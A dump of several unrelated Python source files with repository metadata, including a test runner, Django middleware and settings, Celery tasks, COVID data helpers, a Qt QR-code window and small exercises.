GOODTESTS_URL = globals()['GOODTESTS_URL']
if not thisDir:
thisDir = os.path.dirname(__file__)
if not thisDir:
thisDir = str(os.getcwd())
elif not thisDir.startswith('/'):
thisDir = str(os.getcwd()) + '/' + thisDir
# If GoodTests is in current directory, make sure we find it later
if os.path.exists('./GoodTests.py'):
os.environ['PATH'] = str(os.getcwd()) + ':' + os.environ['PATH']
os.chdir(thisDir)
goodTestsInfo = findGoodTests()
if goodTestsInfo['success'] is False:
downloadRet = download_goodTests(GOODTESTS_URL)
if downloadRet != 0:
return downloadRet
goodTestsInfo = findGoodTests()
if goodTestsInfo['success'] is False:
sys.stderr.write('Could not download or find GoodTests.py. Try to download it yourself using "pip install GoodTests", or wget %s\n' %( GOODTESTS_URL,))
return 1
baseName = os.path.basename(MY_PACKAGE_MODULE)
dirName = os.path.dirname(MY_PACKAGE_MODULE)
newPath = None
if dirName not in ('.', ''):
if dirName.startswith('.'):
dirName = os.getcwd() + os.sep + dirName + os.sep
newPath = dirName
elif dirName == '':
inCurrentDir = False
try:
imp.find_module(MY_PACKAGE_MODULE)
inCurrentDir = True
except ImportError:
# COMPAT WITH PREVIOUS runTests.py: Try plain module in parent directory
foundIt = False
oldSysPath = sys.path[:]
sys.path = [os.path.realpath(os.getcwd() + os.sep + '..' + os.sep)]
try:
imp.find_module(MY_PACKAGE_MODULE)
foundIt = True
sys.path = oldSysPath
except ImportError as e:
sys.path = oldSysPath
if not ALLOW_SITE_INSTALL:
sys.stderr.write('Cannot find "%s" locally.\n' %(MY_PACKAGE_MODULE,))
return 2
else:
try:
__import__(baseName)
except:
sys.stderr.write('Cannot find "%s" locally or in global python path.\n' %(MY_PACKAGE_MODULE,))
return 2
if foundIt is True:
newPath = os.path.realpath(os.getcwd() + os.sep + '..' + os.sep)
if inCurrentDir is True:
newPath = os.path.realpath(os.getcwd() + os.sep + '..' + os.sep)
if newPath:
newPythonPath = [newPath] + [x for x in os.environ.get('PYTHONPATH', '').split(':') if x]
os.environ['PYTHONPATH'] = ':'.join(newPythonPath)
sys.path = [newPath] + sys.path
try:
__import__(baseName)
except ImportError as e:
if baseName.endswith(('.py', '.pyc', '.pyo')):
MY_PACKAGE_MODULE = baseName[ : baseName.rindex('.')]
if e.name != MY_PACKAGE_MODULE:
sys.stderr.write('Error while importing %s: %s\n Likely this is another dependency that needs to be installed\nPerhaps run "pip install %s" or install the providing package.\n\n' %(e.name, str(e), e.name))
return 1
sys.stderr.write('Could not import %s. Either install it or otherwise add to PYTHONPATH\n%s\n' %(MY_PACKAGE_MODULE, str(e)))
return 1
if not os.path.isdir(MY_TEST_DIRECTORY):
if not os.path.exists(MY_TEST_DIRECTORY):
sys.stderr.write('Cannot find test directory: %s\n' %(MY_TEST_DIRECTORY,))
else:
sys.stderr.write('Provided test directory, "%s" is not a directory.\n' %(MY_TEST_DIRECTORY,))
return 3
sys.stdout.write('Starting test..\n')
sys.stdout.flush()
sys.stderr.flush()
didTerminate = False
pipe = subprocess.Popen([sys.executable, goodTestsInfo['path']] + additionalArgs + [MY_TEST_DIRECTORY], env=os.environ, shell=False)
while True:
try:
pipe.wait()
break
except KeyboardInterrupt:
if not didTerminate:
pipe.terminate()
didTerminate = True
else:
pipe.kill()
break
return 0
if __name__ == '__main__':
ret = main(None, sys.argv[1:])
sys.exit(ret)
|
[
"kata198@gmail.com"
] |
kata198@gmail.com
|
9acbe81faeeff0ecc0cb9f08878565903c2b7b02
|
b7c994da6d0f9f70e72f6d075e5881fa6dce1300
|
/interview-prep/is_balanced.py
|
90f76be32b37676bbde3daad4f2437279fd500cd
|
[] |
no_license
|
sagunji/100DaysOfCode
|
8754adc4f3e6b1307795db443356e7b7a308ed69
|
3ad284f46896eaa30d754ee312e15bdd9e8fd9b4
|
refs/heads/master
| 2021-06-20T13:11:28.966632
| 2021-03-17T15:00:30
| 2021-03-17T15:00:30
| 196,589,092
| 0
| 0
| null | 2019-10-31T18:16:24
| 2019-07-12T14:00:49
|
Python
|
UTF-8
|
Python
| false
| false
| 591
|
py
|
def isBalanced(s):
stack = []
top = -1
imbalance = False
for c in s:
if c == "(" or c == "{" or c == "[":
stack.append(c)
top += 1
elif top >= 0 and (
(c == ")" and stack[top] == "(")
or (c == "}" and stack[top] == "{")
or (c == "]" and stack[top] == "[")
):
stack.pop()
top -= 1
else:
imbalance = True
break
if not imbalance:
return "YES" if top < 0 else "NO"
else:
return "NO"
print(isBalanced("{{}}]"))
|
[
"karanjit.sagun01@gmail.com"
] |
karanjit.sagun01@gmail.com
|
945ac396d9fc4880563572cadd72d644c4d95832
|
2c8ab05ba9cbb9307b4efc034054ff4253bb3b9c
|
/src/tracks/tasks.py
|
6a369b2b9aa8a4376d4e0e6975f54141f750fb5b
|
[] |
no_license
|
La0/runreport
|
a76bff526b2b0c0474bfee4ec7850ddbbb6bfd9f
|
1d40035460ced334313ea1b917532051207e5dcb
|
refs/heads/master
| 2023-04-01T22:01:49.583951
| 2017-05-12T12:37:05
| 2017-05-12T12:37:05
| 8,062,434
| 0
| 0
| null | 2021-04-11T16:00:39
| 2013-02-06T23:18:30
|
Python
|
UTF-8
|
Python
| false
| false
| 956
|
py
|
from __future__ import absolute_import
from celery import shared_task, task
import logging
logger = logging.getLogger('tracks.tasks')
@shared_task
def tracks_import(*args, **kwargs):
'''
Import all new Tracks
'''
from users.models import Athlete
from tracks.providers import all_providers
users = Athlete.objects.all()
users = users.order_by('pk')
for user in users:
for provider in all_providers(user):
if not provider.is_connected() or provider.is_locked:
continue
# Start a subtask per import
provider_import.subtask((provider, )).apply_async()
@task
def provider_import(provider):
'''
Run a task for one specific import
between locks
'''
if provider.is_locked:
logger.warning('Provider %s for %s is locked' % (provider.NAME, provider.user) )
return
# Lock this provider
provider.lock()
# Run the import
provider.import_user()
# Unlock this provider
provider.unlock()
|
[
"bastien.abadie@gmail.com"
] |
bastien.abadie@gmail.com
|
36ab449c480d65a79c4ea8aa488c9ea9b231d96c
|
4e7c57ffe10b144e81084a0cb406ff993338378f
|
/tests/test_vlde_return_format.py
|
8ef0bb895857389356c9a734e2a96238678e8b8f
|
[
"Apache-2.0"
] |
permissive
|
myjiejie/vlde
|
65c876d8b390033b9c5b49063f9db21dfca2b893
|
a5b20835639f0c6d42fc2fe1f42cbbe87d776bb2
|
refs/heads/master
| 2023-05-14T21:22:10.109000
| 2017-08-06T06:20:14
| 2017-08-06T06:20:14
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 718
|
py
|
import pytest
from vlde import Validator, ValidateError, RulesError
def test_vlde_return_format_is_object():
'''
Test that validation results are returned as an object
'''
v = Validator(return_format='object')
result1 = v.set_rules('string', 'str')
assert result1.status is True
result2 = v.set_rules('string', 'dict')
assert result2.status is False
def test_vlde_return_format_is_exception():
'''
Test that return_format='exception' reports failures by raising ValidateError
'''
v = Validator(return_format='exception')
try:
hello = 'hello, world'
world = 'world, hello'
v.set_rules(hello, 'required|str')
v.set_rules(world, 'required|str')
except ValidateError as e:
print(e)
|
[
"xiaojieluoff@gmail.com"
] |
xiaojieluoff@gmail.com
|
7da4c9aaf732cf34d6211b259aa76793e428ec41
|
4f7bdeb8d601e29d391cbd08eb8d806158f17e15
|
/App_Financeiro/apps.py
|
cc3f28c42391114c1db58bd871a64f14da46599e
|
[] |
no_license
|
alexandrelalaina/Gestor
|
cca523fe3e4c5a9475aa5aca30dfa113a2e759db
|
ed072ed9065354a492079f3502acca9c8384a566
|
refs/heads/master
| 2020-04-07T13:47:59.162889
| 2018-12-10T01:14:11
| 2018-12-10T01:14:11
| 158,422,092
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 102
|
py
|
from django.apps import AppConfig
class AppFinanceiroConfig(AppConfig):
name = 'App_Financeiro'
|
[
"alexandre_lalaina@yahoo.com.br"
] |
alexandre_lalaina@yahoo.com.br
|
eba72bf58c762207a5c09daf614e1c20370299c3
|
3823561c41ad13d8e07b53ecbbc77411160a870c
|
/haunted/middleware.py
|
1e106b833c6857defeedfc145a3da5e399912c75
|
[] |
no_license
|
specialunderwear/haunted-wagtail
|
1a692b6bbd4417f7b53c3873df663698a5516aae
|
807a5c76ae04d3232577820a53ddcb03e35972b2
|
refs/heads/master
| 2021-09-09T12:58:37.154153
| 2018-03-16T10:53:46
| 2018-03-16T10:53:46
| 125,199,199
| 0
| 0
| null | 2018-03-14T12:23:37
| 2018-03-14T10:59:59
|
Python
|
UTF-8
|
Python
| false
| false
| 1,218
|
py
|
import logging
import re
import lxml.html
from django.conf import settings
logger = logging.getLogger('haunted.ghosts')
def insert_haunted_script(response):
try:
html = response.content
content = lxml.html.fromstring(html)
# styles = content.xpath('//style')
# result = toronado.from_string(html)
# result_html = result.decode('utf-8')
# root = lxml.html.fromstring(result_html)
head = content.find('.//head')
head.insert(-1, lxml.html.fromstring(
'<script type="text/javascript" src="%shaunted/main.js">' % settings.STATIC_URL
))
response.content = lxml.html.tostring(content).decode('utf-8')
return response
except Exception as e:
logger.debug(e)
return response
def haunted_middleware(get_response):
# One-time configuration and initialization.
def middleware(request):
# Code to be executed for each request before
# the view (and later middleware) are called.
response = get_response(request)
# Code to be executed for each request/response after
# the view is called.
return insert_haunted_script(response)
return middleware
|
[
"lars@permanentmarkers.nl"
] |
lars@permanentmarkers.nl
|
94087984192daa510b8192dc4e86bfd61635aec2
|
387ed452e67aa495a8c237ebed9b5bcc2d5e99c2
|
/jhu_helpers.py
|
f2a535426cf242221dd4fd75644567a108c02182
|
[
"MIT"
] |
permissive
|
felixpatzelt/covid-19
|
fdbecdbfb93e1f1d74b669141f1ca4d4db540904
|
5ef14e0bf379527258500f7edaf63f741cc5b4f7
|
refs/heads/master
| 2021-04-01T14:10:18.016201
| 2020-11-06T19:57:03
| 2020-11-06T19:57:03
| 248,192,752
| 1
| 2
|
MIT
| 2020-03-25T22:50:13
| 2020-03-18T09:50:26
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 3,342
|
py
|
# Helpers for loading and transforming the COVID-19 data provided the John Hopkins University
import pandas as pd
def get_jhu_data(
url_prefix = 'https://raw.githubusercontent.com/CSSEGISandData/COVID-19/master/csse_covid_19_data/csse_covid_19_time_series/',
confirmed_file = 'time_series_covid19_confirmed_global.csv',
#recovered_file = 'time_series_19-covid-Recovered.csv',
deaths_file = 'time_series_covid19_deaths_global.csv'
):
"Return confirmed, recovered, deaths according to https://github.com/CSSEGISandData/COVID-19"
confirmed = pd.read_csv(url_prefix + confirmed_file)
#recovered = pd.read_csv(url_prefix + recovered_file)
deaths = pd.read_csv(url_prefix + deaths_file)
return confirmed, deaths
def aggregte_jhu_by_state(confirmed, deaths):
"Aggregate and reshape data from get_jhu to conveniently analyse cases by state"
confirmed = confirmed.drop(['Province/State','Lat','Long'], axis=1).groupby('Country/Region').sum().T
confirmed.index = pd.DatetimeIndex(confirmed.index, name='Date')
#recovered = recovered.drop(['Province/State','Lat','Long'], axis=1).groupby('Country/Region').sum().T
#recovered.index = pd.DatetimeIndex(recovered.index, name='Date')
deaths = deaths.drop(['Province/State','Lat','Long'], axis=1).groupby('Country/Region').sum().T
deaths.index = pd.DatetimeIndex(deaths.index, name='Date')
#infected = (confirmed - recovered - deaths)
# previous infection based on reports have a correlation coefficient of 0.998 with this estimate
infected = confirmed.diff().rolling('21d', min_periods=0).sum()
infection_rate = (infected / infected.shift(1))
return pd.concat({
'confirmed': confirmed, 'deaths': deaths, 'new_infected_21d': infected, 'new_infection_rate_21d': infection_rate
}, axis=1)
def get_aggregate_top_n(jhu_data, metric='confirmed', n_states=20, n_rows=5):
"Return at the most recent numbers for the states with the most cases."
return jhu_data.iloc[-n_rows:,jhu_data.iloc[-1].argsort()[:-n_states:-1]]
def join_jhu_df(confirmed, deaths):
"Return single DataFrame with JHU data and a list of columns names containing the counts for the different days"
# get into shape
non_date_cols = ['Country/Region', 'Province/State', 'Lat', 'Long']
cols = [pd.to_datetime(c).date() if c not in non_date_cols else c for c in confirmed.columns ]
days = [c for c in cols if not c in non_date_cols]
confirmed = confirmed.set_axis(cols, axis=1, inplace=False).set_index(['Country/Region','Province/State'])
#recovered = recovered.set_axis(cols, axis=1, inplace=False).set_index(['Country/Region','Province/State'])
deaths = deaths.set_axis(cols, axis=1, inplace=False).set_index(['Country/Region','Province/State'])
# calculate infected
infected = confirmed.copy()
#infected.loc[:,days] -= recovered[days] + deaths[days]
# previous infection based on reports have a correlation coefficient of 0.998 with this estimate
infected.loc[:,days] = confirmed.loc[:,days].diff(axis=1).rolling(21, min_periods=0, axis=1).sum()
# combine
return pd.concat({
'confirmed': confirmed, 'deaths': deaths, 'new_in_21_days': infected
}, axis=1), days
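# --- Hedged usage sketch (added; downloads live data, so network access is assumed) ---
if __name__ == '__main__':
    confirmed, deaths = get_jhu_data()
    by_state = aggregte_jhu_by_state(confirmed, deaths)
    # show the three most recent rows for the five states with the most confirmed cases
    print(get_aggregate_top_n(by_state['confirmed'], n_states=5, n_rows=3))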
|
[
"noreply@github.com"
] |
felixpatzelt.noreply@github.com
|
25c0f5149b1b8478dab19786fbd606db7f34aca2
|
a3eafb9ed3a53f5dacf01a1805713080b934a4a2
|
/oregano_gui/qt/qrwindow.py
|
f6f3b5f5a4cfc3f8ac6111db7da1544d49b643a4
|
[
"MIT"
] |
permissive
|
cculianu/Oregano
|
d0b071cf5ff3d8f05a16afbf06530dab07e92e79
|
cc08f813f9cbdb80d1ac607892f8439ec064ee04
|
refs/heads/main
| 2023-04-12T19:22:10.080018
| 2021-05-02T11:42:53
| 2021-05-02T11:42:53
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,104
|
py
|
#!/usr/bin/env python3
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2014 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from PyQt5.QtCore import Qt
from PyQt5.QtWidgets import QHBoxLayout, QVBoxLayout, QWidget, QDialog, QPushButton, QSizePolicy
from oregano_gui.qt.qrcodewidget import QRCodeWidget, save_to_file, copy_to_clipboard
from .util import WWLabel, Buttons, MessageBoxMixin
from oregano.i18n import _
from oregano.util import Weak
class QR_Window(QWidget, MessageBoxMixin):
def __init__(self):
super().__init__() # Top-level window. Parent needs to hold a reference to us and clean us up appropriately.
self.setWindowTitle('Oregano - ' + _('Payment Request'))
self.label = ''
self.amount = 0
self.setFocusPolicy(Qt.NoFocus)
self.setSizePolicy(QSizePolicy.MinimumExpanding, QSizePolicy.MinimumExpanding)
main_box = QHBoxLayout(self)
main_box.setContentsMargins(12,12,12,12)
self.qrw = QRCodeWidget()
self.qrw.setSizePolicy(QSizePolicy.MinimumExpanding, QSizePolicy.MinimumExpanding)
main_box.addWidget(self.qrw, 2)
vbox = QVBoxLayout()
vbox.setContentsMargins(12,12,12,12)
main_box.addLayout(vbox,2)
main_box.addStretch(1)
self.address_label = WWLabel()
self.address_label.setTextInteractionFlags(Qt.TextSelectableByMouse)
vbox.addWidget(self.address_label)
self.msg_label = WWLabel()
self.msg_label.setTextInteractionFlags(Qt.TextSelectableByMouse)
vbox.addWidget(self.msg_label)
self.amount_label = WWLabel()
self.amount_label.setTextInteractionFlags(Qt.TextSelectableByMouse)
vbox.addWidget(self.amount_label)
self.op_return_label = WWLabel()
self.op_return_label.setTextInteractionFlags(Qt.TextSelectableByMouse)
vbox.addWidget(self.op_return_label)
vbox.addStretch(2)
copyBut = QPushButton(_("Copy QR Image"))
saveBut = QPushButton(_("Save QR Image"))
vbox.addLayout(Buttons(copyBut, saveBut))
weakSelf = Weak.ref(self) # Qt & Python GC hygiene: don't hold references to self in non-method slots as it appears Qt+Python GC don't like this too much and may leak memory in that case.
weakQ = Weak.ref(self.qrw)
weakBut = Weak.ref(copyBut)
copyBut.clicked.connect(lambda: copy_to_clipboard(weakQ(), weakBut()))
saveBut.clicked.connect(lambda: save_to_file(weakQ(), weakSelf()))
def set_content(self, win, address_text, amount, message, url, *, op_return = None, op_return_raw = None):
if op_return is not None and op_return_raw is not None:
raise ValueError('Must specify exactly one of op_return or op_return_hex as kwargs to QR_Window.set_content')
self.address_label.setText(address_text)
if amount:
amount_text = '{} {}'.format(win.format_amount(amount), win.base_unit())
else:
amount_text = ''
self.amount_label.setText(amount_text)
self.msg_label.setText(message)
self.qrw.setData(url)
if op_return:
self.op_return_label.setText(f'OP_RETURN: {str(op_return)}')
elif op_return_raw:
self.op_return_label.setText(f'OP_RETURN (raw): {str(op_return_raw)}')
self.op_return_label.setVisible(bool(op_return or op_return_raw))
self.layout().activate()
def closeEvent(self, e):
# May have modal up when closed -- because wallet window may force-close
# us when it is gets closed (See ElectrumWindow.clean_up in
# main_window.py).
# .. So kill the "QR Code Copied to clipboard" modal dialog that may
# be up as it can cause a crash for this window to be closed with it
# still up.
for c in self.findChildren(QDialog):
if c.isWindow() and c.isModal() and c.isVisible():
c.reject() # break out of local event loop for dialog as we are about to die and we will be invalidated.
super().closeEvent(e)
|
[
"karol.trzeszczkowski@gmail.com"
] |
karol.trzeszczkowski@gmail.com
|
11018d159b126cd3b9a30102bd66558aeb5831e1
|
6c2fab5a73c666d41bec2087396851f2d0547c2c
|
/threading1.py
|
fcc395d1719b33ff67f488ef243bfe9c4fcfd587
|
[] |
no_license
|
legendtkl/pypractise
|
b89717286d14882a520e3b9626f1eb6a94ddd30a
|
234b9c3f78ec76d00a1bab3fced4316131227492
|
refs/heads/master
| 2021-01-18T21:36:46.044055
| 2016-04-06T10:41:33
| 2016-04-06T10:41:33
| 41,008,614
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 557
|
py
|
import threading,time
from time import sleep,ctime
def now():
return str(time.strftime('%Y-%m-%d %H:%M:%S', time.localtime()))
def test(nloop, nsec):
print 'start loop', nloop, 'at:', now()
sleep(nsec)
print 'loop', nloop, 'done at:', now()
def main():
print 'starting at:', now()
threadpool=[]
for i in xrange(10):
th = threading.Thread(target=test, args=(i,2))
threadpool.append(th)
for th in threadpool:
th.start()
for th in threadpool:
threading.Thread.join(th)
print 'all Done at: ', now()
if __name__ == "__main__":
main()
|
[
"taokelu@gmail.com"
] |
taokelu@gmail.com
|
6c6dbcaf3913d2e2b2b9fc3c5de707c3b2a3ccde
|
96fe7cb1495928a9699ade24200b445755e47f3b
|
/src/structurizr/api/structurizr_client_settings.py
|
c8752c888dfdcca0a4140292f2c169cca1c36d8a
|
[
"Apache-2.0"
] |
permissive
|
Midnighter/structurizr-python
|
ab4a9f71c01d1febde5c6e61a3a961953f1ef440
|
31f1dcadb3ff113d8a77ce132657237ea01c307b
|
refs/heads/devel
| 2023-02-08T19:43:22.344155
| 2023-01-21T10:12:49
| 2023-01-21T10:12:49
| 144,895,441
| 61
| 16
|
Apache-2.0
| 2023-01-21T09:53:35
| 2018-08-15T19:35:01
|
Python
|
UTF-8
|
Python
| false
| false
| 3,435
|
py
|
# Copyright (c) 2020, Moritz E. Beber.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Provide the Structurizr client settings."""
import logging
from getpass import getuser
from pathlib import Path
from socket import getfqdn
from typing import Optional
try:
from importlib.metadata import version
except ModuleNotFoundError:
from importlib_metadata import version
from pydantic import UUID4, BaseSettings, DirectoryPath, Field, HttpUrl
__all__ = ("StructurizrClientSettings",)
logger = logging.getLogger(__name__)
try:
USER = getuser()
except ModuleNotFoundError:
logger.error(
"Could not determine the username. Please set it manually or provide a "
"STRUCTURIZR_USER environment variable."
)
USER = "anonymous"
hostname = getfqdn()
if hostname:
USER = f"{USER}@{hostname}"
AGENT = f"structurizr-python/{version('structurizr-python')}"
class StructurizrClientSettings(BaseSettings):
"""
Define the Structurizr client settings.
Attributes:
url (str): The Structurizr API URL.
workspace_id (int): The Structurizr workspace identifier.
api_key (str): The Structurizr workspace API key.
api_secret (str): The Structurizr workspace API secret.
user (str): A string identifying the user (e.g. an e-mail address or username).
agent (str): A string identifying the agent (e.g. 'structurizr-java/1.2.0').
workspace_archive_location (pathlib.Path): A directory for archiving downloaded
workspaces.
"""
url: HttpUrl = Field(
default="https://api.structurizr.com",
env="STRUCTURIZR_URL",
description="The Structurizr API URL.",
)
workspace_id: int = Field(
...,
env="STRUCTURIZR_WORKSPACE_ID",
description="The Structurizr workspace identifier.",
)
api_key: UUID4 = Field(
...,
env="STRUCTURIZR_API_KEY",
description="The Structurizr workspace API key.",
)
api_secret: UUID4 = Field(
...,
env="STRUCTURIZR_API_SECRET",
description="The Structurizr workspace API secret.",
)
user: str = Field(
default=USER,
env="STRUCTURIZR_USER",
description="A string identifying the user (e.g. an e-mail address or "
"username).",
)
agent: str = Field(
default=AGENT,
env="STRUCTURIZR_AGENT",
description="A string identifying the agent (e.g. 'structurizr-java/1.2.0').",
)
workspace_archive_location: Optional[DirectoryPath] = Field(
default=Path.cwd(),
env="STRUCTURIZR_WORKSPACE_ARCHIVE_LOCATION",
description="A directory for archiving downloaded workspaces, or None to "
"suppress archiving.",
)
class Config:
"""Configure the Structurizr client settings."""
case_sensitive = True
env_prefix = "STRUCTURIZR_"
env_file = ".env"
|
[
"midnighter@posteo.net"
] |
midnighter@posteo.net
|
191346bd7866002cf2567ce2f66b37874aa9dafc
|
c5789b6576ac914ce7269834b6a288ad8fe418a0
|
/Utilities/native_event_handler.py
|
567ecc5b3fb266a59e6c283f91e75acc9a78d53b
|
[
"Apache-2.0"
] |
permissive
|
utkarsh7236/SCILLA
|
3ebdd2cef7dc65061e4ae334a0c6b50efc052aa7
|
e11e4d753823ad522a1b3168283b6e6ffe3ea393
|
refs/heads/master
| 2022-08-03T18:06:01.905309
| 2020-05-27T08:29:07
| 2020-05-27T08:29:07
| 264,383,513
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,093
|
py
|
#!/usr/bin/env python
#==============================================================
import os
import time
import uuid
import fnmatch
from Utilities.decorators import thread, process
#==============================================================
class FileEventHandler(object):
def __init__(self, action, pattern):
self.pattern = pattern
self.action = action
self.stopped = True
self.ident = str(uuid.uuid4())[:8]
@thread
def execute(self, found_file):
self.action(found_file)
@thread
def stream(self, path):
executed_matches = []
self.run = True
self.stopped = False
while True:
matches = []
for root, dir_name, file_names in os.walk(path):
for file_name in fnmatch.filter(file_names, self.pattern):
matches.append(os.path.join(root, file_name))
for match in matches:
if match in executed_matches: continue
time.sleep(0.005)
executed_matches.append(match)
self.execute(match)
if not self.run: break
self.stopped = True
def stop(self):
self.run = False
while not self.stopped:
time.sleep(0.05)
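# --- Hedged usage sketch (added; path and action are illustrative) ---
# handler = FileEventHandler(action=print, pattern='*.txt')
# handler.stream('/tmp/watched') # returns immediately; polling runs on a @thread-decorated background thread
# handler.stop() # blocks until the polling loop notices and exits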
|
[
"utkarsh7236@gmail.com"
] |
utkarsh7236@gmail.com
|
47e1d7e513554163a8a70acdbfa11df610694f3d
|
cea490c99880c5121c20afdb148340a706b4b5c6
|
/src/web-interface/capturepic.py
|
8243e782722e09aaa8b3de28bb9220e63f52da33
|
[] |
no_license
|
sgichohi/sauron
|
1bb3be91b94a7c3e124bbed8af83996f1ee2dbf5
|
da0ae915e1cf92195d4f3e5be425877e09a7c138
|
refs/heads/master
| 2021-07-14T11:23:53.437430
| 2019-11-05T20:38:31
| 2019-11-05T20:38:31
| 14,182,504
| 0
| 0
| null | 2021-03-19T22:17:06
| 2013-11-06T19:07:06
|
C++
|
UTF-8
|
Python
| false
| false
| 1,230
|
py
|
from utils import ensure_dir
import cv2
from models import CameraFrame
from cameraClient import CameraClient
import os
import settings
def saveImage(conn, parent_dir, session):
ensure_dir(parent_dir)
count = 0 # plain int (the Python 2 long literal 0L is a syntax error in Python 3)
while True:
path = conn.recv()
fileLocation = path
#print "filelocation", fileLocation
#fileLocation = os.path.relpath(path, settings.STATIC_DIR["path"])
fr = CameraFrame(location=fileLocation, lamport_time=count)
session.add(fr)
if count % 10 == 0:
session.commit()
count += 1
session.commit()
conn.close()
def grabFrame(conn, port):
cam = CameraClient('127.0.0.1', int(port))
while True:
#im = cam.getDir()
for im in cam.getDir():
conn.send(im)
def ngrabFrame(conn, port):
"""Grabs a frame from the network"""
cap = cv2.VideoCapture(0)
while(cap.isOpened()):
ret, frame = cap.read()
if ret==True:
conn.send(frame)
cv2.imshow('frame',frame)
if cv2.waitKey(1) & 0xFF == ord('q'):
break
else:
break
cap.release()
conn.close()
cv2.destroyAllWindows()
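# --- Editor's wiring sketch (assumptions: the port, directory, and SQLAlchemy
# `session` are illustrative placeholders; not part of the original script) ---
# from multiprocessing import Pipe, Process
# parent_conn, child_conn = Pipe()
# grabber = Process(target=grabFrame, args=(parent_conn, 5000))
# saver = Process(target=saveImage, args=(child_conn, "frames/", session))
# grabber.start(); saver.start()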
|
[
"samuel.kiiru@gmail.com"
] |
samuel.kiiru@gmail.com
|
1c019cbb6eb7a1ea56e120459e6de533ca6d8b6c
|
0fa113c0b5fdacfa3345672a26875ce2699bc81c
|
/auctions/migrations/0016_alter_whatchlist_auction_list.py
|
560897115378dd327a0ca26324875fe96671eee4
|
[] |
no_license
|
Fideran/commerce
|
5750fa8c259fba536f06f89a0ff731fc9a95600b
|
f6a65077d2b76c450750d470e654cf61ba16aeae
|
refs/heads/master
| 2023-08-21T15:54:25.070441
| 2021-10-15T15:42:19
| 2021-10-15T15:42:19
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 531
|
py
|
# Generated by Django 3.2.6 on 2021-09-08 17:50
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('auctions', '0015_alter_whatchlist_user'),
]
operations = [
migrations.AlterField(
model_name='whatchlist',
name='auction_list',
field=models.ForeignKey(default=None, on_delete=django.db.models.deletion.CASCADE, related_name='auction_lists', to='auctions.auction'),
),
]
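# For context (editor's addition, inferred from the AlterField above): after this
# migration the field is equivalent to declaring, in auctions/models.py:
#
#     class Whatchlist(models.Model):
#         auction_list = models.ForeignKey(
#             'auctions.Auction', default=None,
#             on_delete=models.CASCADE, related_name='auction_lists')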
|
[
"fenofiderana5@gmail.com"
] |
fenofiderana5@gmail.com
|
61dace6b37d778c0d4a8d5a63ac59129c3ca283b
|
7be0540640d6bbbccebf2c956f424527dd77cd55
|
/pytest.py
|
26db34d2dafc05d3004aceb579e36fc632884917
|
[] |
no_license
|
ToonyawatA/Example
|
278bb2f2a07294fa5c3e79a5845254bfa28a678d
|
9fdd462c4f1e62de9d38bdc4d2930ab4dab5f832
|
refs/heads/master
| 2023-03-21T11:29:23.825314
| 2021-03-08T23:59:13
| 2021-03-08T23:59:13
| 343,769,540
| 0
| 0
| null | 2021-03-04T00:25:57
| 2021-03-02T12:37:58
|
Julia
|
UTF-8
|
Python
| false
| false
| 62
|
py
|
def abc(x, y):
return x+y
def qwe(x, y):
return x*y
|
[
"physicstj301136"
] |
physicstj301136
|
77f6db07aa43c88970d7844bffed3e7999b5340a
|
953c2cdd9a554b90392dc8754546eb914dd68ee9
|
/project/asgi.py
|
32bd127d5fbf2bd343b2dd813743871df16b6014
|
[
"MIT"
] |
permissive
|
kajala/django-jutil
|
68d24b99f706b53f9a183978fcd6e7541e7ac8de
|
b32aeaeeee8cbcb37a8cf241bd7271e7c9e669d5
|
refs/heads/develop
| 2023-09-02T10:07:53.334084
| 2023-08-28T14:23:45
| 2023-08-28T14:23:45
| 121,220,767
| 7
| 2
|
MIT
| 2023-07-02T16:43:50
| 2018-02-12T08:35:25
|
Python
|
UTF-8
|
Python
| false
| false
| 407
|
py
|
"""
ASGI config for project project.
It exposes the ASGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/howto/deployment/asgi/
"""
import os
from django.core.asgi import get_asgi_application # type: ignore
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'project.settings')
application = get_asgi_application()
|
[
"kajala@gmail.com"
] |
kajala@gmail.com
|
9b44c3a37622560b29530ed836ed10361b1c5473
|
c5758c1f4c880f4530df1a5ffb4c30ee2da445ee
|
/pytracking/tracker/segm_sk_max/__init__.py
|
a20006a5c97b46f827888b1d0108506ee38ff2b3
|
[] |
no_license
|
bfjei2825401/d3s
|
6d662fc301181a0e3ad831b0db6111e3cf8f4097
|
32140a3c67252f0e98cbfbf6ad6d2a79267c221b
|
refs/heads/master
| 2023-02-27T09:57:25.692878
| 2021-01-27T14:20:57
| 2021-01-27T14:20:57
| 297,217,521
| 0
| 0
| null | 2020-09-21T03:23:09
| 2020-09-21T03:23:09
